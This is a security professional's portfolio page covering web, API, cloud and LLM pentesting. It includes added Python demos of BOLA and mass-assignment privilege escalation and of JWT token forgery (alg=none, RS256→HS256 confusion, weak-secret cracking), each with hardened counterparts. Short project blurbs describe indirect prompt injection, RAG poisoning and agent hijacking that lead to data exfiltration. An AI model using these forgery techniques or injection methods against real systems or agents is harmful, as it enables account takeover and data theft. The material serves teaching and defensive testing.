Open to Offensive Security Roles

Karthikeyan V

Senior Security Analyst @ Accenture
4+ Years · Chennai, India · Web / API / AI / Cloud Pentesting

Offensive Security Practitioner

I'm Karthikeyan V, a Senior Security Analyst at Accenture with 4+ years of hands-on experience in offensive security. I specialise in finding exploitable vulnerabilities in web applications, APIs, and cloud infrastructure — before adversaries do.

Currently, I lead penetration testing engagements on Accenture's internal and cloud-hosted applications, including B2C platforms and Microsoft PowerApps. Every engagement follows the OWASP Web Security Testing Guide (WSTG) for web applications and OWASP API Security Top 10 for API assessments — ensuring comprehensive, methodology-driven coverage.

I've performed real-world vulnerability research on targets including demo.testfire.net and the Acunetix test environment, uncovering injection flaws, broken authentication, and misconfiguration chains with documented PoCs and CWE mappings.

My frontier research is in AI & LLM Security — investigating prompt injection, agentic AI attack surfaces, and RAG pipeline exploitation. As AI systems proliferate, securing them demands the same adversarial rigour we apply to traditional applications. Pursuing OSCP+, CISSP, and CCSP to deepen both offensive mastery and strategic security leadership.

4+ Years Offensive Security
200+ Vulnerabilities Identified
50+ Pentest Engagements
3 Microsoft/Azure Certs
OWASP WSTG + API Specialist
AI / LLM Security Research
Technical Arsenal

Tools, techniques, and technologies across the full offensive security spectrum — from recon to exploitation.

🎯
Web Pentesting
Burp Suite Pro · OWASP ZAP · OWASP WSTG · SQLMap · ffuf · dirsearch · gobuster · nikto · XSS Hunter · CSRF PoC
🔌
API Security
Postman · REST / GraphQL · OWASP API Top 10 · JWT Analysis · OAuth 2.0 · API Fuzzing · mitmproxy · BOLA / BFLA
☁️
Cloud Security
Azure · AWS · MS PowerApps · IAM Misconfig · Storage Exposure · ScoutSuite · Prowler · Pacu
🤖
AI / LLM Security
Prompt Injection · Jailbreaking · LLM Fuzzing · OWASP LLM Top 10 · Agentic AI · RAG Poisoning · Model Inversion
💻
Programming
Python · Bash · JavaScript · PoC Development · Exploit Scripting · Automation · Tool Chaining
🔬
Recon & Infrastructure
Nmap · Metasploit · Wireshark · Nessus · Qualys · Kali Linux · Shodan · theHarvester
Career Timeline

Offensive security engagements, vulnerability research, and pentest delivery across enterprise environments.

Senior Security Analyst
Accenture
Jan 2026 — Present
Leading penetration testing engagements on Accenture's internal and cloud-hosted applications, including customer-facing B2C platforms and Microsoft PowerApps deployments. All web application assessments follow the OWASP Web Security Testing Guide (WSTG) framework; API security testing follows the OWASP API Security Top 10.

Conducting AI/LLM penetration testing for clients integrating generative AI pipelines. Identifying critical vulnerabilities including IDOR chains, authentication bypass via JWT manipulation, SSRF-to-internal-access escalation, and cloud IAM privilege escalation paths. Delivering executive and technical pentest reports with CVSS scoring, CWE mapping, and actionable remediation roadmaps.
OWASP WSTG · OWASP API Top 10 · Web VAPT · API Pentesting · MS PowerApps · Cloud Pentesting · AI/LLM Security · Azure
Security Analyst
Cognizant Technology Solutions (CTS)
Mar 2022 — Dec 2025
Conducted 50+ web application penetration tests across banking, e-commerce, and healthcare verticals. Delivered API security assessments using OWASP API Top 10 methodology — uncovering BOLA, mass assignment, and sensitive data exposure vulnerabilities. Performed vulnerability research on public test environments including demo.testfire.net and the Acunetix test environment, documenting injection flaws, broken authentication chains, and misconfiguration exploits with full PoC write-ups and CWE mapping.

Built custom Python exploits for PoC demonstration, authored detailed technical and executive security reports, and initiated internal research into LLM prompt injection as AI integrations entered client environments.
Web Pentesting · API Security · Vulnerability Assessment · Burp Suite · Python Exploits · LLM Research · OWASP WSTG
Security Projects

Real-world penetration testing with CWE mapping, CVE references, and documented attack methodologies.

🕸️
Critical
Web Application VAPT — Acunetix Test Environment
Full-scope penetration test on the Acunetix vulnerable web application. Discovered reflected and stored XSS, SQL injection via multiple parameters, CSRF vulnerabilities, and insecure file upload leading to remote code execution.
Tools: Burp Suite Pro, SQLMap, ffuf, OWASP ZAP
CWE: CWE-79 · CWE-89 · CWE-352 · CWE-434
Method: OWASP WSTG — Full Coverage
Impact: RCE · Session Hijacking · Data Exfiltration
🏦
Critical
Banking App VAPT — demo.testfire.net
Penetration test of a banking web application simulation. Identified SQL injection in login and search parameters, broken authentication allowing account takeover, and sensitive data exposure in HTTP responses and client-side code.
Tools: Burp Suite, SQLMap, dirsearch, Postman
CWE: CWE-89 · CWE-287 · CWE-200 · CWE-311
OWASP Top 10 Ref: A01:2021 · A02:2021 · A03:2021
Impact: Account Takeover · PII Exposure · Auth Bypass
🔌
Critical
REST API Security Assessment
Comprehensive API security review following OWASP API Top 10. Found BOLA enabling lateral data access across user accounts, broken function-level authorization exposing admin endpoints, and mass assignment allowing privilege escalation via API body parameter injection.
Tools: Postman, Burp Suite, mitmproxy, jwt_tool
CWE: CWE-285 · CWE-915 · CWE-269 · CWE-862
Method: OWASP API Security Top 10
Impact: Unauthorised Access · Privilege Escalation
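The three findings in this card (BOLA, broken function-level authorization, and mass assignment) come from one recurring handler pattern. The following is an added illustration, not code from the page or from any engagement described on it: an in-memory profile store with a hypothetical PATCH /users/{id} handler written the vulnerable way and then the hardened way. The user records, ids and field names are constructed for the example.

```python
"""Three OWASP API Top 10 failures on one in-memory profile store, each beside its fix:
BOLA (client-chosen object id, no ownership check), mass assignment (request body bound
straight onto the model, so `role` becomes writable) and the BFLA that the forged role
then unlocks. Constructed example; no real service or data is involved."""
import copy
from typing import Any, Dict

# Constructed sample data. Sequential ids are the kind an attacker enumerates in a URL path.
SEED: Dict[int, Dict[str, Any]] = {
    101: {"id": 101, "email": "alice@example.test", "display_name": "alice", "role": "user"},
    102: {"id": 102, "email": "bob@example.test", "display_name": "bob", "role": "user"},
}


class Forbidden(Exception):
    pass


def fresh_store() -> Dict[int, Dict[str, Any]]:
    return copy.deepcopy(SEED)


# ---- vulnerable handlers (hypothetical PATCH /users/{id} and GET /admin/users) ----------

def vuln_patch_user(store, caller_id: int, target_id: int, body: dict) -> dict:
    user = store[target_id]   # BOLA: target_id comes from the URL and is never compared to caller
    user.update(body)         # mass assignment: every JSON key in the body lands on the model
    return user


def vuln_list_users(store, caller_id: int) -> list:
    # The role check itself is correct; the BFLA exists because `role` is attacker-writable above.
    if store[caller_id]["role"] != "admin":
        raise Forbidden("admin only")
    return sorted(store)


# ---- hardened handler ------------------------------------------------------------------

WRITABLE = frozenset({"email", "display_name"})   # explicit allowlist of client-settable fields


def safe_patch_user(store, caller_id: int, target_id: int, body: dict) -> dict:
    # Object-level authorization: the caller may only edit its own record unless it is an admin.
    if target_id != caller_id and store[caller_id]["role"] != "admin":
        raise Forbidden("object belongs to another user")
    rejected = set(body) - WRITABLE
    if rejected:
        # Fail closed on unknown fields rather than silently dropping them: a silently
        # ignored `role` hides the attempt from both the tester and the defender's logs.
        raise ValueError(f"fields not writable: {sorted(rejected)}")
    store[target_id].update(body)
    return store[target_id]


def demo() -> dict:
    """Runs the attack chain against both handler sets and returns what each allowed."""
    results = {}
    bob = 102

    s = fresh_store()
    # BOLA: bob rewrites alice's e-mail, the usual precursor to a password-reset takeover.
    results["bola_email"] = vuln_patch_user(s, bob, 101, {"email": "bob-evil@example.test"})["email"]
    # Mass assignment -> BFLA: bob grants himself admin, then the admin endpoint opens up.
    vuln_patch_user(s, bob, bob, {"role": "admin"})
    results["bfla_listing"] = vuln_list_users(s, bob)

    s = fresh_store()
    try:
        safe_patch_user(s, bob, 101, {"email": "bob-evil@example.test"})
        results["safe_bola"] = "allowed"
    except Forbidden:
        results["safe_bola"] = "blocked"
    try:
        safe_patch_user(s, bob, bob, {"role": "admin"})
        results["safe_mass_assign"] = "allowed"
    except ValueError:
        results["safe_mass_assign"] = "blocked"
    results["safe_role"] = s[bob]["role"]
    # Legitimate self-service edit still works through the allowlist.
    results["safe_rename"] = safe_patch_user(s, bob, bob, {"display_name": "robert"})["display_name"]
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The testing heuristic the hardened version encodes: authorization is decided from the caller's identity and the target object's owner, never from anything in the request body, and the set of bindable fields is an allowlist defined next to the handler rather than whatever the model happens to expose.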
🔑
High
JWT Security Analysis & Exploitation
Deep-dive research into JWT implementation flaws. Demonstrated algorithm confusion attack (RS256→HS256), none algorithm acceptance bypass, and weak secret brute-forcing with Hashcat — achieving admin token forgery with full account takeover PoC.
Tools: jwt_tool, Hashcat, Burp Suite, Python
CWE: CWE-347 · CWE-327 · CWE-798
CVE Ref: CVE-2022-21449 (Psychic Signatures: Java 15–18 ECDSA verification accepting an all-zero signature, so an ES256 token with r = s = 0 passes)
Impact: Auth Bypass · Admin Token Forgery
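The three JWT flaws named in this card share one root cause: the verifier lets the token's own header pick the algorithm. The block below is an added, dependency-free illustration, not code from the page or from the research it describes. It builds a minimal verifier both ways, forges an alg=none token and an RS256→HS256 confusion token, and runs a wordlist attack on a weak HS256 secret (the manual equivalent of Hashcat mode 16500). The public-key PEM is a constructed stand-in, and RSA verification is a stub that always fails, which is the correct outcome for every token built here since none carries a real RSA signature.

```python
"""Mini JWT verifier showing alg=none acceptance, RS256->HS256 algorithm confusion and
weak-secret recovery. Constructed example: the PEM is not a real key and rs256_verify is
a stub, so the only way a forged token can pass is through one of the two bugs shown."""
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed stand-in for the server's RSA public key PEM. Its exact bytes do not matter:
# the attacker only needs the same bytes the verifier will hand to HMAC.
PUBLIC_KEY_PEM = (b"-----BEGIN PUBLIC KEY-----\n"
                  b"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAexample0000\n"
                  b"-----END PUBLIC KEY-----\n")


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _json(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":"), sort_keys=True).encode()


def make_token(payload: dict, alg: str, key: bytes = b"") -> str:
    """Attacker-side encoder: alg=none and HS256 are all that forgery needs."""
    signing_input = f"{b64url(_json({'alg': alg, 'typ': 'JWT'}))}.{b64url(_json(payload))}"
    if alg == "none":
        return signing_input + "."
    if alg == "HS256":
        mac = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
        return signing_input + "." + b64url(mac)
    raise ValueError("forgery helper only emits none/HS256")


def rs256_verify(signing_input: bytes, signature: bytes, public_key: bytes) -> bool:
    """Stub for RSA PKCS#1 v1.5 verification (omitted to stay dependency-free)."""
    return False


def verify_vulnerable(token: str, key: bytes) -> dict:
    """Classic mistake: the header chooses the algorithm, and one `key` argument doubles
    as RSA public key (RS256) and HMAC secret (HS256)."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    signing_input = f"{h}.{p}".encode()
    if alg == "none":                                   # bug 1: unsigned tokens accepted
        return json.loads(b64url_decode(p))
    if alg == "HS256":                                  # bug 2: public key used as HMAC secret
        expected = hmac.new(key, signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    elif alg == "RS256" and rs256_verify(signing_input, b64url_decode(s), key):
        return json.loads(b64url_decode(p))
    raise ValueError("invalid signature")


def verify_hardened(token: str, public_key: bytes, expected_alg: str = "RS256") -> dict:
    """Pin the algorithm server-side; the header is only checked for agreement."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if expected_alg == "none" or header.get("alg") != expected_alg:
        raise ValueError("algorithm not allowed")
    if not rs256_verify(f"{h}.{p}".encode(), b64url_decode(s), public_key):
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(p))


def crack_hs256(token: str, wordlist) -> Optional[str]:
    """Offline dictionary attack on an HS256 secret; returns the secret or None."""
    h, p, s = token.split(".")
    signing_input, target = f"{h}.{p}".encode(), b64url_decode(s)
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


def demo() -> dict:
    admin = {"sub": "1337", "role": "admin"}
    none_token = make_token(admin, "none")
    confused = make_token(admin, "HS256", PUBLIC_KEY_PEM)   # signed with the *public* key
    results = {
        "vuln_accepts_none": verify_vulnerable(none_token, PUBLIC_KEY_PEM)["role"],
        "vuln_accepts_confusion": verify_vulnerable(confused, PUBLIC_KEY_PEM)["role"],
    }
    for name, tok in (("hard_rejects_none", none_token), ("hard_rejects_confusion", confused)):
        try:
            verify_hardened(tok, PUBLIC_KEY_PEM)
            results[name] = False
        except ValueError:
            results[name] = True
    weak = make_token({"sub": "42"}, "HS256", b"secret123")   # constructed weak secret
    results["cracked_secret"] = crack_hs256(weak, ["password", "changeme", "secret123", "hunter2"])
    return results


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The check a tester wants from the hardened verifier is not just "rejects these two tokens" but that `expected_alg` is fixed by configuration and the key is looked up for that algorithm only; libraries such as PyJWT expose this as the mandatory `algorithms=` list, and the mistake is leaving it to the header.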
☁️
Critical
Azure Cloud Misconfiguration Assessment
Azure security review identifying overly permissive IAM roles, publicly exposed storage blobs containing credentials, disabled MFA on privileged accounts, and misconfigured MS PowerApps environments — enabling lateral movement to production subscriptions.
Tools: ScoutSuite, Prowler, Azure CLI, Pacu
CWE: CWE-732 · CWE-306 · CWE-284 · CWE-522
Method: CIS Azure Benchmark v2.0
Impact: Full Tenant Compromise · Credential Theft
🤖
Critical
LLM Prompt Injection & Agentic AI Security
Adversarial testing of LLM-integrated enterprise applications. Demonstrated indirect prompt injection via poisoned documents, context hijacking, goal hijacking in agentic AI workflows, and RAG pipeline poisoning — with tool-execution abuse leading to data exfiltration.
Tools: Garak, PromptBench, LangChain, Python
CWE: CWE-77 · CWE-20
OWASP LLM Top 10: LLM01 · LLM08
Method: OWASP LLM Top 10 / Manual Red Team
Impact: Data Exfil · System Prompt Leak · Agent Hijack
Credentials & Roadmap

Active Microsoft/Azure certifications and high-value offensive security credentials in progress.

🛡️
AZ-500
Microsoft Azure
Azure Security Engineer Associate — cloud security posture, identity & access, threat protection.
✓ Earned
🔒
SC-200
Microsoft Security
Security Operations Analyst Associate — Microsoft Sentinel, Defender XDR, threat hunting.
✓ Earned
🌐
SC-900
Microsoft Security
Security, Compliance & Identity Fundamentals — Microsoft security ecosystem foundations.
✓ Earned
⚔️
OSCP+
OffSec
Offensive Security Certified Professional+ — advanced exploitation, active directory, evasion.
⟳ In Progress
🏛️
CISSP
(ISC)²
Certified Information Systems Security Professional — strategic security management & architecture.
⟳ In Progress
☁️
CCSP
(ISC)²
Certified Cloud Security Professional — cloud architecture, data security, platform security.
⟳ In Progress
Security Research

Independent research at the intersection of AI security, offensive techniques, and emerging attack surfaces.

RESEARCH · 01
Prompt Injection in Enterprise LLM Applications
Systematic study of direct and indirect prompt injection vulnerabilities in enterprise LLM deployments. Analysis of attack vectors through user-controlled content, external data sources, and multi-modal inputs. Developed a threat taxonomy mapping injection types to business impact categories aligned with OWASP LLM Top 10.
GPT-4o · Claude · Gemini · OWASP LLM01 · Python · Garak
RESEARCH · 02
Agentic AI Attack Surface Analysis
Exploration of security risks in autonomous AI agents with access to tools, memory, and external APIs. Research demonstrates tool-poisoning attacks, memory injection via RAG pipelines, and multi-agent trust boundary exploitation — with working PoC for cascading agent compromise via indirect prompt injection.
LangChain · AutoGen · CrewAI · RAG · Tool Poisoning · OWASP LLM08
RESEARCH · 03
API Attack Chaining: IDOR to Internal RCE
Research on chaining low-severity API vulnerabilities to achieve high-impact outcomes following OWASP API Security Top 10. Documents attack paths from IDOR → BOLA → credential exposure → SSRF → internal service RCE, with detection strategies and API gateway hardening recommendations for each chain link.
REST APIs · GraphQL · SSRF · BOLA · Burp Suite · OWASP API Top 10
RESEARCH · 04
Azure IAM Privilege Escalation Playbook
Comprehensive research mapping 30+ privilege escalation paths in Azure environments from overly permissive IAM policies. Covers managed identity exploitation, PassRole abuse, cross-subscription role chaining, and PowerApps environment misconfigurations — with Bicep/Terraform remediation templates for each finding.
Azure · MS PowerApps · IAM · Managed Identity · ScoutSuite · Pacu

Get In Touch

Available for offensive security roles, consulting engagements, and AI security research collaborations. Open to discussions about red team positions, VAPT projects, and security research partnerships.